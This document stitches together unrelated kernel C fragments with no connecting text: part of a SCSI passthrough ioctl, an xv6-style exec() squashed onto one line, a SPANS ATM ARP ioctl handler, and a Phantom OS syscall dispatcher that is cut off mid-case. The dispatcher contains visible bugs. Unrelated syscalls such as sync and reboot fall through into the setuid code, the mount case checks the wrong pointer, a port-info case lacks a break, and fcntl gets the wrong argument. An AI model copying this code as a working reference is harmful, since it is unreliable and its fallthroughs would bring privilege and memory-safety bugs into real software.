		ival = disable_lock(INTCLASS1, &sp->buf_lock);
		while ((Ubp->b_flags & B_DONE) == 0) {
			e_sleep_thread(&Ubp->b_event, &sp->buf_lock,
			    LOCK_HANDLER);
		}
		unlock_enable(ival, &sp->buf_lock);
	} else {
		/*
		 * If ENXIO, We never actually got started.
		 */
		if (r == ENXIO && once == 0) {
			/* Retry once with resume+delay set. */
			once++;
			usc->flags |= SC_RESUME|SC_DELAY_CMD;
			goto again;
		}
		sp->needresume = 1;
		Trace2(1, "%d: devstrat=%d", __LINE__, r);
		goto out;
	}

	Trace4(1, "%d: b_flags %x b_error %d b_resid %d", __LINE__,
	    Ubp->b_flags, Ubp->b_error, Ubp->b_resid);
	Trace5(1, "%d: sv %x st %x gc %x as %x", __LINE__,
	    usc->status_validity, usc->scsi_status,
	    usc->general_card_status, usc->adap_q_status);

	if (Ubp->b_flags & B_ERROR) {
		r = Ubp->b_error;
		sp->needresume = 1;
	}

	/* SCSI-level error: maybe run an automatic REQUEST SENSE. */
	if (usc->status_validity & SC_SCSI_ERROR) {
		sbyte = (usc->scsi_status & SCSI_STATUS_MASK);
		sp->needresume = 1;
		if (sbyte == SC_CHECK_CONDITION && l->senselen) {
			struct sc_buf *usl;
			struct buf *Sbp;

			/* make_rqs pins/maps the caller's sense buffer. */
			r = make_rqs(sp, albits, l->sense_buf,
			    l->senselen, (dflag & DKERNEL) != 0);
			if (r) {
				Trace2(0, "%d: make_rqs=%d", __LINE__, r);
				goto out;
			}
			usl = &sp->rqsbuf;
			Sbp = &usl->bufstruct;
			r = devstrat(Sbp);
			if (r == 0) {
				ival = disable_lock(INTCLASS1, &sp->buf_lock);
				while ((Sbp->b_flags & B_DONE) == 0) {
					e_sleep_thread(&Sbp->b_event,
					    &sp->buf_lock, LOCK_HANDLER);
				}
				unlock_enable(ival, &sp->buf_lock);
			} else {
				Trace2(0, "%d:ds=%d for rqs", __LINE__, r);
				goto out;
			}
			/* Unwind the sense-buffer mapping made by make_rqs. */
			xmdetach(&Sbp->b_xmemd);
			if (dflag & DKERNEL) {
				(void) unpinu(l->sense_buf, l->senselen,
				    UIO_SYSSPACE);
			} else {
				(void) unpinu(l->sense_buf, l->senselen,
				    UIO_USERSPACE);
			}
			Trace4(1, "%d SENSE: b_flags %x b_error %d b_resid %d",
			    __LINE__, Sbp->b_flags, Sbp->b_error, Sbp->b_resid);
			Trace5(1, "%d: sv %x st %x gc %x as %x", __LINE__,
			    usl->status_validity, usl->scsi_status,
			    usl->general_card_status, usl->adap_q_status);
			if (usl->scsi_status || usl->general_card_status) {
				r = EIO;
			} else {
				rqvalid = 1;	/* sense data is usable */
			}
		}
	}

	if (usc->status_validity & SC_ADAPTER_ERROR) {
		sp->needresume = 1;
		Trace2(0, "%d: adapter error 0x%x", __LINE__,
		    usc->general_card_status);
		Ubp->b_flags |= B_ERROR;
		/* All adapter-level errors map to EIO today. */
		switch (usc->general_card_status) {
		case SC_NO_DEVICE_RESPONSE:
		case SC_HOST_IO_BUS_ERR:
		case SC_SCSI_BUS_FAULT:
		case SC_CMD_TIMEOUT:
		case SC_ADAPTER_HDW_FAILURE:
		case SC_ADAPTER_SFW_FAILURE:
		case SC_FUSE_OR_TERMINAL_PWR:
		case SC_SCSI_BUS_RESET:
		default:
			r = EIO;
			break;
		}
	}

	/*
	 * Log errors through errsave function
	 */
	if (usc->status_validity & (SC_SCSI_ERROR|SC_ADAPTER_ERROR)) {
		struct sc_error_log_df log;

		memset(&log, 0, sizeof (log));
		/*
		 * All errors are 'temporary unknown driver error'
		 */
		log.error_id = ERRID_SCSI_ERR6;
		(void) sprintf(log.resource_name, "gsc%d", unit);
		memcpy(&log.scsi_command, &usc->scsi_command,
		    sizeof (struct scsi));
		log.status_validity = usc->status_validity;
		log.scsi_status = usc->scsi_status;
		log.general_card_status = usc->general_card_status;
		if (rqvalid) {
			int amt;

			/* Cap logged sense data at 128 bytes. */
			if (l->senselen > 128)
				amt = 128;
			else
				amt = l->senselen;
			(void) copyin(l->sense_buf, log.req_sense_data, amt);
		}
		errsave(&log, sizeof (struct sc_error_log_df));
	}

	/* Return the SCSI status byte to the caller. */
	if (dflag & DKERNEL) {
		*l->statusp = sbyte;
	} else {
		r2 = copyout(&sbyte, l->statusp, 1);
		if (r2 != 0) {
			if (r == 0)
				r = r2;
			goto out;
		}
	}

out:
	/* Unwind exactly as much buffer setup as was completed. */
	if (l->datalen) {
		if (upin > 1) {
			xmdetach(&Ubp->b_xmemd);
			upin--;
		}
		if (upin > 0) {
			if (dflag & DKERNEL) {
				(void) unpinu(l->data_buf, l->datalen,
				    UIO_SYSSPACE);
			} else {
				(void) unpinu(l->data_buf, l->datalen,
				    UIO_USERSPACE);
			}
			upin--;
		}
	}
	Trace2(1, "%d: returning %d", __LINE__, r);
	if (r)
		setuerror(r);
	MJ_RTN (r);
}
int exec(char *path, char **argv) { char *s, *last; int i, off; uint argc, sz, sp, ustack[3+MAXARG+1]; struct elfhdr elf; struct inode *ip; struct proghdr ph; pde_t *pgdir, *oldpgdir; if((ip = namei(path)) == 0) return -1; ilock(ip); pgdir = 0; // Check ELF header if(readi(ip, (char*)&elf, 0, sizeof(elf)) < sizeof(elf)) goto bad; if(elf.magic != ELF_MAGIC) goto bad; if((pgdir = setupkvm(kalloc)) == 0) goto bad; // Load program into memory. // leave first page inaccessible (to make NULL ref fail) sz = PGSIZE-1; for(i=0, off=elf.phoff; i<elf.phnum; i++, off+=sizeof(ph)){ if(readi(ip, (char*)&ph, off, sizeof(ph)) != sizeof(ph)) goto bad; if(ph.type != ELF_PROG_LOAD) continue; if(ph.memsz < ph.filesz) goto bad; if((sz = allocuvm(pgdir, sz, ph.vaddr + ph.memsz)) == 0) goto bad; if(loaduvm(pgdir, (char*)ph.vaddr, ip, ph.off, ph.filesz) < 0) goto bad; } iunlockput(ip); ip = 0; // Allocate two pages at the next page boundary. // Make the first inaccessible. Use the second as the user stack. sz = PGROUNDUP(sz); if((sz = allocuvm(pgdir, sz, sz + 2*PGSIZE)) == 0) goto bad; clearpteu(pgdir, (char*)(sz - 2*PGSIZE)); sp = sz; // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { if(argc >= MAXARG) goto bad; sp = (sp - (strlen(argv[argc]) + 1)) & ~3; if(copyout(pgdir, sp, argv[argc], strlen(argv[argc]) + 1) < 0) goto bad; ustack[3+argc] = sp; } ustack[3+argc] = 0; ustack[0] = 0xffffffff; // fake return PC ustack[1] = argc; ustack[2] = sp - (argc+1)*4; // argv pointer sp -= (3+argc+1) * 4; if(copyout(pgdir, sp, ustack, (3+argc+1)*4) < 0) goto bad; // Save program name for debugging. 
for(last=s=path; *s; s++) if(*s == '/') last = s+1; safestrcpy(proc->name, last, sizeof(proc->name)); // hook up the old shared memory to the new addr space // (no need to change refcount, because the old ref goes away with // this exec, so it's +1 then -1 => 0 change if (proc->shared) { extern void mappages(pde_t *pgdir, void *va, uint size, uint pa, int perm); mappages(pgdir, (char *)SHARED_V, PGSIZE, v2p(proc->shared->page), PTE_W|PTE_U); } // Commit to the user image. oldpgdir = proc->pgdir; proc->pgdir = pgdir; proc->sz = sz; proc->tf->eip = elf.entry; // main proc->tf->esp = sp; switchuvm(proc); freevm(oldpgdir); return 0; bad: if(pgdir) freevm(pgdir); if(ip) iunlockput(ip); return -1; }
/*
 * SPANS ARP IOCTL support
 *
 * Function will be called from a critical section.
 *
 * Arguments:
 *	code	PF_ATM sub-operation code
 *	data	pointer to code specific parameter data area
 *	arg1	pointer to code specific argument
 *
 * Returns:
 *	0	request procesed
 *	errno	error processing request - reason indicated
 *
 */
int
spansarp_ioctl(int code, caddr_t data, caddr_t arg1)
{
	struct atmaddreq	*aap;
	struct atmdelreq	*adp;
	struct atminfreq	*aip;
	struct spans		*spp;
	struct spanscls		*clp;
	struct spansarp		*sap;
	struct air_arp_rsp	aar;
	struct ip_nif		*inp;
	struct ipvcc		*ivp, *inext;
	struct in_addr		ip;
	u_long			dst;
	int			err = 0, i, buf_len;
	caddr_t			buf_addr;

	switch (code) {

	case AIOCS_ADD_ARP:
		/*
		 * Add a permanent ARP mapping
		 */
		aap = (struct atmaddreq *)data;
		clp = (struct spanscls *)arg1;
		inp = clp->cls_ipnif;
		if ((aap->aar_arp_addr.address_format != T_ATM_SPANS_ADDR) ||
		    (aap->aar_arp_origin != ARP_ORIG_PERM)) {
			err = EINVAL;
			break;
		}
		ip = SATOSIN(&aap->aar_arp_dst)->sin_addr;

		/*
		 * See if we already have an entry for this IP address
		 */
		SPANSARP_LOOKUP(ip.s_addr, sap);
		if (sap == NULL) {
			/*
			 * No, get a new arp entry
			 */
			sap = (struct spansarp *)atm_allocate(&spansarp_pool);
			if (sap == NULL) {
				err = ENOMEM;
				break;
			}

			/*
			 * Get entry set up
			 */
			sap->sa_dstip = ip;
			ATM_ADDR_COPY(&aap->aar_arp_addr, &sap->sa_dstatm);
			sap->sa_dstatmsub.address_format = T_ATM_ABSENT;
			sap->sa_dstatmsub.address_length = 0;
			sap->sa_cls = clp;
			sap->sa_flags |= SAF_VALID;
			sap->sa_origin = SAO_PERM;

			/*
			 * Add entry to table
			 */
			SPANSARP_ADD(sap);
			break;
		}

		/*
		 * See if we're attempting to change the ATM address for
		 * this cached entry
		 */
		if ((sap->sa_dstatm.address_format != T_ATM_ABSENT) &&
		    (!ATM_ADDR_EQUAL(&aap->aar_arp_addr, &sap->sa_dstatm) ||
		     (clp != sap->sa_cls))) {
			/*
			 * Yes, notify IP/ATM that a mapping change has
			 * occurred.  IP/ATM will close any VCC's which
			 * aren't waiting for this map.
			 * SAF_LOCKED guards the VCC list while the
			 * notify callbacks run.
			 */
			sap->sa_flags |= SAF_LOCKED;
			for (ivp = sap->sa_ivp; ivp; ivp = inext) {
				inext = ivp->iv_arpnext;
				(*inp->inf_arpnotify)(ivp, MAP_CHANGED);
			}
			sap->sa_flags &= ~SAF_LOCKED;
		}

		/*
		 * Update the cached entry with the new data
		 */
		ATM_ADDR_COPY(&aap->aar_arp_addr, &sap->sa_dstatm);
		sap->sa_cls = clp;

		/*
		 * If this entry isn't valid, notify anyone who might
		 * be interested
		 */
		if ((sap->sa_flags & SAF_VALID) == 0) {
			sap->sa_flags |= SAF_LOCKED;
			for (ivp = sap->sa_ivp; ivp; ivp = inext) {
				inext = ivp->iv_arpnext;
				(*inp->inf_arpnotify)(ivp, MAP_VALID);
			}
			sap->sa_flags &= ~SAF_LOCKED;
		}

		/*
		 * Remove this entry from the retry chain
		 */
		UNLINK(sap, struct spansarp, spansarp_retry_head, sa_rnext);

		/*
		 * Mark the entry as permanent
		 */
		sap->sa_flags |= SAF_VALID;
		sap->sa_origin = SAO_PERM;
		break;

	case AIOCS_DEL_ARP:
		/*
		 * Delete an ARP mapping
		 */
		adp = (struct atmdelreq *)data;
		clp = (struct spanscls *)arg1;
		ip = SATOSIN(&adp->adr_arp_dst)->sin_addr;

		/*
		 * Now find the entry to be deleted
		 */
		SPANSARP_LOOKUP(ip.s_addr, sap);
		if (sap == NULL) {
			err = ENOENT;
			break;
		}

		/*
		 * Notify all VCCs using this entry that they must finish
		 * up now.
		 */
		sap->sa_flags |= SAF_LOCKED;
		for (ivp = sap->sa_ivp; ivp; ivp = inext) {
			inext = ivp->iv_arpnext;
			(*ivp->iv_ipnif->inf_arpnotify)(ivp, MAP_FAILED);
		}

		/*
		 * Now free up the entry
		 */
		UNLINK(sap, struct spansarp, spansarp_retry_head, sa_rnext);
		SPANSARP_DELETE(sap);
		atm_free((caddr_t)sap);
		break;

	case AIOCS_INF_ARP:
		/*
		 * Get ARP table information
		 */
		aip = (struct atminfreq *)data;
		spp = (struct spans *)arg1;

		if (aip->air_arp_addr.sa_family != AF_INET)
			break;
		/* INADDR_ANY in the request means "dump all entries". */
		dst = SATOSIN(&aip->air_arp_addr)->sin_addr.s_addr;

		buf_addr = aip->air_buf_addr;
		buf_len = aip->air_buf_len;

		if ((clp = spp->sp_cls) == NULL)
			break;

		/*
		 * Run through entire arp table
		 */
		for (i = 0; i < SPANSARP_HASHSIZ; i++) {
			for (sap = spansarp_arptab[i]; sap;
			    sap = sap->sa_next) {
				/*
				 * We only want entries learned
				 * from the supplied interface.
				 */
				if (sap->sa_cls != clp)
					continue;
				if ((dst != INADDR_ANY) &&
				    (dst != sap->sa_dstip.s_addr))
					continue;

				/*
				 * Make sure there's room in the user's buffer
				 */
				if (buf_len < sizeof(aar)) {
					err = ENOSPC;
					break;
				}

				/*
				 * Fill in info to be returned
				 */
				SATOSIN(&aar.aap_arp_addr)->sin_family =
				    AF_INET;
				SATOSIN(&aar.aap_arp_addr)->sin_addr.s_addr =
				    sap->sa_dstip.s_addr;
				strlcpy(aar.aap_intf,
				    clp->cls_ipnif->inf_nif->nif_if.if_xname,
				    sizeof(aar.aap_intf));
				aar.aap_flags = sap->sa_flags;
				aar.aap_origin = sap->sa_origin;
				if (sap->sa_flags & SAF_VALID)
					aar.aap_age = SPANSARP_MAXAGE -
					    sap->sa_reftime;
				else
					aar.aap_age = 0;
				ATM_ADDR_COPY(&sap->sa_dstatm, &aar.aap_addr);
				ATM_ADDR_COPY(&sap->sa_dstatmsub,
				    &aar.aap_subaddr);

				/*
				 * Copy the response into the user's buffer
				 */
				if ((err = copyout((caddr_t)&aar, buf_addr,
				    sizeof(aar))) != 0)
					break;
				buf_addr += sizeof(aar);
				buf_len -= sizeof(aar);
			}
			/* Propagate inner-loop errors out of the scan. */
			if (err)
				break;
		}

		/*
		 * Update the buffer pointer and length
		 */
		aip->air_buf_addr = buf_addr;
		aip->air_buf_len = buf_len;
		break;

	case AIOCS_INF_ASV:
		/*
		 * Get ARP server information
		 */
		/* SPANS doesn't have an ARP server */
		break;

	default:
		err = EOPNOTSUPP;
	}

	return (err);
}
static void do_syscall_sw( uuprocess_t *u, struct trap_state *st) { #if HAVE_UNIX int callno = st->eax; /* unsigned int mina = 0, maxa = 0; { extern struct real_descriptor ldt[]; struct real_descriptor dsd = ldt[ st->ds/8 ]; mina = dsd.base_low | (dsd.base_med << 16) | (dsd.base_high << 24); maxa = (dsd.limit_low | dsd.limit_high << 16); if( dsd.granularity & SZ_G) maxa *= PAGE_SIZE; maxa += mina; } */ //phantom_thread_t *t = GET_CURRENT_THREAD(); //uuprocess_t *u = t->u; /* tid_t tid = get_current_tid(); pid_t pid; assert( !t_get_pid( tid, &pid )); uuprocess_t *u = proc_by_pid(pid); */ assert( u != 0 ); unsigned int mina = (int)u->mem_start, maxa = (int)u->mem_end; // trap state is good for interrupt. // call gate does not push eflags int user_esp = st->eflags; #ifndef ARCH_ia32 # warning machdep ia32 arg pass convention #endif // list of user syscsall arguments int *uarg = adjustin( user_esp, st ); uarg++; // syscall func return addr //SHOW_FLOW( 10, "Syscall pid %2d tid %2d, our esp %p, user esp %p, t kstack %p", u->pid, t->tid, &st, user_esp, t->kstack_top ); SHOW_FLOW( 8, "Syscall %d args %x, %x, %x", callno, uarg[0], uarg[1],uarg[2] ); int ret = 0; int err = 0; switch(callno) { case SYS__exit: // TODO housekeeping? SHOW_FLOW( 2, "exit %d", uarg[0] ); hal_exit_kernel_thread(); err = ENOSYS; break; case SYS_ssyslog: syslog( uarg[0], "%s", (const char *)adjustin( uarg[1], st ) ); SHOW_FLOW( 2, "syslog %d %s", uarg[0], (const char *)adjustin( uarg[1], st ) ); //SHOW_ERROR0( 0, "syslog not impl" ); break; case SYS_sleepmsec: //SHOW_FLOW( 2, "sleepmsec %d", uarg[0] ); hal_sleep_msec(uarg[0]); break; case SYS_getpagesize: ret = PAGE_SIZE; break; case SYS_personality: if( ((unsigned) uarg[0]) == 0xffffffff) { ret = 0; // Say we're Linux... well...to some extent. 
break; } err = EINVAL; break; case SYS_uname: err = copyout(uarg[0], mina, maxa, &phantom_uname, sizeof(phantom_uname) ); if( err ) ret = -1; break; case SYS_getuid: ret = u->uid; break; case SYS_getuid32: ret = u->uid;; break; case SYS_getegid: ret = u->egid; break; case SYS_getegid32: ret = u->egid; break; case SYS_geteuid: ret = u->euid; break; case SYS_geteuid32: ret = u->euid; break; case SYS_getgid: ret = u->gid; break; case SYS_getgid32: ret = u->gid; break; case SYS_gettid: ret = get_current_tid(); break; case SYS_getpid: ret = u->pid; break; case SYS_getpgrp: ret = u->pgrp_pid; break; case SYS_getppid: ret = u->ppid; break; case SYS_getpgid: goto unimpl; case SYS_time: { time_t t = time(0); AARG(time_t *, tp, 0, sizeof(time_t)); *tp = t; ret = t; break; } case SYS_nanosleep: // todo check for POSIX compliance, make it interruptible by signals //int nanosleep(const struct timespec *, struct timespec *); { goto unimpl; //AARG(struct timespec *, req_time, 0, sizeof(struct timespec)); //AARG(struct timespec *, rest_time, 1, sizeof(struct timespec)); //ret = usys_nanosleep( &err, u, req_time, rest_time ); //break; } case SYS_sync: case SYS_sysinfo: case SYS_sysfs: case SYS_klogctl: case SYS_shutdown: case SYS_reboot: case SYS_getitimer: case SYS_setitimer: case SYS_gettimeofday: case SYS_setuid: case SYS_setuid32: CHECK_CAP(CAP_SETUID); u->euid = uarg[0]; break; case SYS_setgid: case SYS_setgid32: CHECK_CAP(CAP_SETGID); u->egid = uarg[0]; break; case SYS_setgroups: case SYS_setgroups32: goto unimpl; case SYS_setpgid: case SYS_setregid: case SYS_setregid32: case SYS_setresgid: case SYS_setresgid32: case SYS_setresuid: case SYS_setresuid32: case SYS_setreuid: case SYS_setreuid32: goto unimpl; case SYS_open: ret = usys_open(&err, u, adjustin( uarg[0], st ), uarg[1], uarg[2] ); break; case SYS_close: ret = usys_close(&err, u, uarg[0] ); break; case SYS_read: { int count = uarg[2]; void *addr = adjustin( uarg[1], st ); CHECKA(addr,count); ret = usys_read(&err, u, 
uarg[0], addr, count ); break; } case SYS_write: { int count = uarg[2]; void *addr = adjustin( uarg[1], st ); CHECKA(addr,count); ret = usys_write(&err, u, uarg[0], addr, count ); break; } case SYS_lseek: ret = usys_lseek(&err, u, uarg[0], uarg[1], uarg[2] ); break; case SYS_creat: ret = usys_creat(&err, u, adjustin( uarg[0], st ), uarg[1] ); break; case SYS_chdir: { AARG(const char *, path, 0, 0); ret = usys_chdir(&err, u, path ); break; } case SYS_pipe: { AARG(int *, fds, 0, sizeof(int) * 2); ret = usys_pipe( &err, u, fds ); break; } case SYS_rmdir: case SYS_unlink: { AARG(const char *, name, 0, 1); ret = usys_rm( &err, u, name ); break; } case SYS_dup: ret = usys_dup( &err, u, uarg[0] ); break; case SYS_dup2: ret = usys_dup2( &err, u, uarg[0], uarg[1] ); break; case SYS_symlink: { AARG(const char *, n1, 0, 1); AARG(const char *, n2, 1, 1); ret = usys_symlink( &err, u, n1, n2 ); break; } case SYS_getcwd: { AARG(char *, buf, 0, uarg[1]); ret = usys_getcwd( &err, u, buf, uarg[1] ); break; } case SYS_mkdir: { AARG(const char *, path, 0, 2); ret = usys_mkdir( &err, u, path ); break; } case SYS_link: case SYS__llseek: case SYS_chroot: case SYS_lstat64: case SYS_mknod: goto unimpl; case SYS_mount: { const char *source = adjustin( uarg[0], st ); CHECKA(source,0); const char *target = adjustin( uarg[1], st ); CHECKA(target,0); const char *fstype = adjustin( uarg[2], st ); CHECKA(target,0); const void *data = adjustin( uarg[4], st ); CHECKA(data,0); ret = usys_mount(&err, u, source, target, fstype, uarg[3], data ); break; } case SYS_umount: { const char *target = adjustin( uarg[0], st ); CHECKA(target,0); ret = usys_umount(&err, u, target, 0 ); break; } /* case SYS_umount2: { const char *target = adjustin( uarg[0], st ); CHECKA(target); ret = usys_umount(&err, u, target, uarg[1] ); break; } */ case SYS_truncate: { AARG(const char *, path, 0, 0); ret = usys_truncate(&err, u, path, uarg[1] ); break; } case SYS_ftruncate: { ret = usys_ftruncate(&err, u, uarg[0], uarg[1] ); 
break; } case SYS_truncate64: case SYS_ftruncate64: goto unimpl; case SYS_fchdir: ret = usys_fchdir( &err, u, uarg[0] ); break; case SYS_readdir: { AARG(struct dirent *, ent, 1, sizeof(struct dirent)); ret = usys_readdir( &err, u, uarg[0], ent ); break; } case SYS_fchmod: ret = usys_fchmod( &err, u, uarg[0], uarg[1] ); break; case SYS_fchown: case SYS_fchown32: ret = usys_fchown( &err, u, uarg[0], uarg[1], uarg[2] ); break; case SYS_fcntl: { //AARG(void *, str, 2, sizeof(int)); // FIXME size of arg? ret = usys_fcntl( &err, u, uarg[0], uarg[1], uarg[0] ); } break; case SYS_fcntl64: case SYS_fdatasync: case SYS_flock: case SYS_fstat64: case SYS_fstatfs: case SYS_fsync: case SYS_utime: case SYS_chmod: case SYS_chown: case SYS_chown32: case SYS_access: case SYS_lchown: case SYS_lchown32: case SYS_pread: case SYS_pwrite: goto unimpl; case SYS_readv: { int fd = uarg[0]; int iovcnt = uarg[2]; AARG(struct iovec *, list, 1, sizeof(struct iovec) * iovcnt); unsigned int onerc; int lp; for( lp = 0; lp < iovcnt; lp++ ) { void *addr = adjustin( list[lp].iov_base, st ); CHECKA(addr,list[lp].iov_len); onerc = usys_read(&err, u, fd, addr, list[lp].iov_len ); /* if( onerc < 0 ) { ret = -1; goto err_ret; } */ ret += onerc; if( onerc < list[lp].iov_len ) break; } break; } case SYS_writev: { int fd = uarg[0]; int iovcnt = uarg[2]; AARG(struct iovec *, list, 1, sizeof(struct iovec) * iovcnt); unsigned int onerc; int lp; for( lp = 0; lp < iovcnt; lp++ ) { void *addr = adjustin( list[lp].iov_base, st ); CHECKA(addr,list[lp].iov_len); onerc = usys_write(&err, u, fd, addr, list[lp].iov_len ); /* if( onerc < 0 ) { ret = -1; goto err_ret; } */ ret += onerc; if( onerc < list[lp].iov_len ) break; } break; } case SYS_readlink: goto unimpl; case SYS_gethostname: { int len = uarg[1]; char *target = adjustin( uarg[0], st ); CHECKA(target,len); ret = usys_gethostname(&err, u, target, len ); break; } case SYS_sethostname: { int len = uarg[1]; const char *target = adjustin( uarg[0], st ); 
CHECKA(target,len); ret = usys_sethostname(&err, u, target, len ); break; } case SYS_socket: ret = usys_socket( &err, u, uarg[0], uarg[1], uarg[2] ); break; case SYS_setsockopt: { socklen_t optlen = uarg[4]; AARG(const void *, optval, 3, optlen); ret = usys_setsockopt( &err, u, uarg[0], uarg[1], uarg[2], optval, optlen); break; } case SYS_getsockopt: { AARG(socklen_t *, optlen, 4, sizeof(socklen_t)); AARG(void *, optval, 3, *optlen); ret = usys_getsockopt( &err, u, uarg[0], uarg[1], uarg[2], optval, optlen); break; } case SYS_getpeername: { AARG(socklen_t *, namelen, 2, sizeof(socklen_t)); AARG(struct sockaddr *, name, 1, *namelen); ret = usys_getpeername( &err, u, uarg[0], name, namelen); break; } case SYS_getsockname: { AARG(socklen_t *, namelen, 2, sizeof(socklen_t)); AARG(struct sockaddr *, name, 1, *namelen); ret = usys_getsockname( &err, u, uarg[0], name, namelen); break; } case SYS_bind: { AARG(const struct sockaddr *, addr, 1, sizeof(struct sockaddr)); ret = usys_bind( &err, u, uarg[0], addr, uarg[2] ); break; } case SYS_listen: ret = usys_listen( &err, u, uarg[0], uarg[1] ); break; case SYS_accept: { AARG( socklen_t *, len, 2, sizeof(socklen_t)); AARG( struct sockaddr *, acc_addr, 1, *len ); ret = usys_accept( &err, u, uarg[0], acc_addr, len ); break; } case SYS_recv: { int len = uarg[2]; AARG( void *, buf, 0, len ); ret = usys_recv( &err, u, uarg[0], buf, len, uarg[3] ); break; } case SYS_recvmsg: { AARG( struct msghdr *, msg, 0, sizeof(struct msghdr) ); ret = usys_recvmsg( &err, u, uarg[0], msg, uarg[2] ); break; } case SYS_send: { int len = uarg[2]; AARG( const void *, buf, 0, len ); ret = usys_send( &err, u, uarg[0], buf, len, uarg[3] ); break; } case SYS_sendmsg: { AARG( const struct msghdr *, msg, 0, sizeof(struct msghdr) ); ret = usys_sendmsg( &err, u, uarg[0], msg, uarg[2] ); break; } case SYS_sendto: { socklen_t tolen = uarg[5]; AARG( const struct sockaddr *, to, 4, tolen ); int len = uarg[2]; AARG( const void *, buf, 0, len ); ret = usys_sendto( 
&err, u, uarg[0], buf, len, uarg[3], to, tolen ); break; } case SYS_recvfrom: { AARG( socklen_t *, fromlen, 5, sizeof(socklen_t) ); AARG( struct sockaddr *, from, 4, *fromlen ); int len = uarg[2]; AARG( void *, buf, 0, len ); ret = usys_recvfrom( &err, u, uarg[0], buf, len, uarg[3], from, fromlen ); break; } case SYS_connect: // int connect(int socket, const struct sockaddr *address, socklen_t address_len); { int len = uarg[2]; AARG( struct sockaddr *, acc_addr, 1, len ); ret = usys_connect( &err, u, uarg[0], acc_addr, len ); break; } case SYS_socketpair: { AARG( int *, sv, 3, sizeof(int) * 2 ); ret = usys_socketpair( &err, u, uarg[0], uarg[1], uarg[2], sv ); break; } case SYS_sendfile: case SYS_socketcall: goto unimpl; case SYS_nice: { // int nice = uarg[0]; // set thr prio // break; goto unimpl; } case SYS_brk: goto unimpl; /*{ ret = usys_sbrk( &err, u, uarg[0] ); break; }*/ case SYS_fork: case SYS_vfork: goto unimpl; case SYS_ioctl: { void *data = adjustin( uarg[2], st ); CHECKA(data,0); ret = usys_ioctl( &err, u, uarg[0], uarg[1], data, uarg[3] ); break; } int statlink; case SYS_lstat: statlink = 1; goto dostat; case SYS_stat: statlink = 0; goto dostat; dostat: { const char *path = adjustin( uarg[0], st ); CHECKA(path,0); struct stat *data = adjustin( uarg[1], st ); CHECKA(data,sizeof(struct stat)); ret = usys_stat( &err, u, path, data, statlink ); break; } case SYS_fstat: { struct stat *data = adjustin( uarg[1], st ); CHECKA(data,sizeof(struct stat)); ret = usys_fstat( &err, u, uarg[0], data, 0 ); break; } case SYS_umask: { ret = u->umask; u->umask = uarg[0]; break; } case SYS_kill: { ret = usys_kill( &err, u, uarg[0], uarg[1] ); break; } case SYS_waitpid: { AARG(int *, addr, 1, sizeof(int)); ret = usys_waitpid( &err, u, uarg[0], addr, uarg[2] ); break; } case SYS_wait: { AARG(int *, addr, 0, sizeof(int)); ret = usys_waitpid( &err, u, -1, addr, 0 ); break; } case SYS_clone: goto unimpl; case SYS_madvise: case SYS_mincore: case SYS_mlock: case SYS_mlockall: 
case SYS_mmap: case SYS_mprotect: case SYS_mremap: case SYS_msync: case SYS_munlock: case SYS_munlockall: case SYS_munmap: goto unimpl; // NewOS/BeOS/Haiku case SYS_create_port: { // TODO check string length and final addr to be valid AARG(const char *, name, 1, 0); ret = port_create( uarg[0], name ); break; } case SYS_close_port: ret = port_close( uarg[0] ); break; case SYS_delete_port: ret = port_delete( uarg[0] ); break; case SYS_find_port: { // TODO check string length and final addr to be valid AARG(const char *, name, 0, 0); ret = port_find(name); break; } case SYS_get_port_info: { AARG(struct port_info *, info, 1, sizeof(struct port_info)); ret = port_get_info( uarg[0], info); } case SYS_get_port_bufsize: ret = port_buffer_size( uarg[0] ); break; case SYS_get_port_bufsize_etc: ret = port_buffer_size_etc( uarg[0], uarg[1], uarg[2] ); break; case SYS_get_port_count: ret = port_count( uarg[0] ); break; case SYS_read_port: { AARG(int32_t *, msg_code, 1, sizeof(int32_t)); AARG(void *, msg_buffer, 2, uarg[3]); ret = port_read( uarg[0], msg_code, msg_buffer, uarg[3]); break; } case SYS_write_port: { //AARG(int32_t *, msg_code, 1, sizeof(int32_t)); //AARG(int32_t, msg_code, 1, sizeof(int32_t)); AARG(void *, msg_buffer, 2, uarg[3]); ret = port_write( uarg[0], uarg[1], msg_buffer, uarg[3]); break; } case SYS_read_port_etc: case SYS_write_port_etc: case SYS_set_port_owner: case SYS_get_next_port_info: goto unimpl; case SYS_phantom_run: { // extern int phantom_run(const char *fname, const char **argv, const char **envp, int flags); AARG(const char *, fname, 0, 1); AARG(const char **, uav, 1, 4); AARG(const char **, uep, 2, 4); if( 0 == uarg[1] ) uav = 0; if( 0 == uarg[2] ) uep = 0; SHOW_FLOW( 2, "run %s flags 0x%b", fname, uarg[3], "\020\1<WAIT>\2<NEWWIN>\3<NEWPGRP>" ); char *a[1024]; char *e[1024]; SHOW_FLOW( 2, "run %s load args", fname ); if( user_args_load( mina, maxa, a, 1024, uav ) || user_args_load( mina, maxa, e, 1024, uep ) ) { ret = -1; err = EFAULT; 
SHOW_ERROR( 0, "fault reading args for %s", fname ); goto err_ret; } ret = usys_run( &err, u, fname, (const char**)a, (const char**)e, uarg[3] ); break; } case SYS_phantom_method: // AARG(const char *, m_name, 0, 1); // int nfd = aarg[1]; // AARG(int *, fds, 0, sizeof(int)*nfd); // ret = usys_pmethod( &err, u, m_name, int nfd, int fds[] ); case SYS_phantom_toobject: case SYS_phantom_fromobject: case SYS_phantom_intmethod: case SYS_phantom_strmethod: goto unimpl; // extern int phantom_runclass(const char *cname, int nmethod, int flags); case SYS_phantom_runclass: { AARG(const char *, cname, 0, 1); unsigned flags = uarg[2]; if(flags) SHOW_ERROR( 0, "SYS_phantom_runclass: unknown flags %x" , flags ); usys_phantom_runclass( &err, u, cname, uarg[1] ); ret = err; } break; case SYS_setproperty: { AARG(const char *, pName, 1, 1); // TODO check zero term string! AARG(const char *, pValue, 2, 1); usys_setproperty( &err, u, uarg[0], pName, pValue ); ret = err; } break; case SYS_getproperty: { AARG(const char *, pName, 1, 1); // TODO check zero term string! 
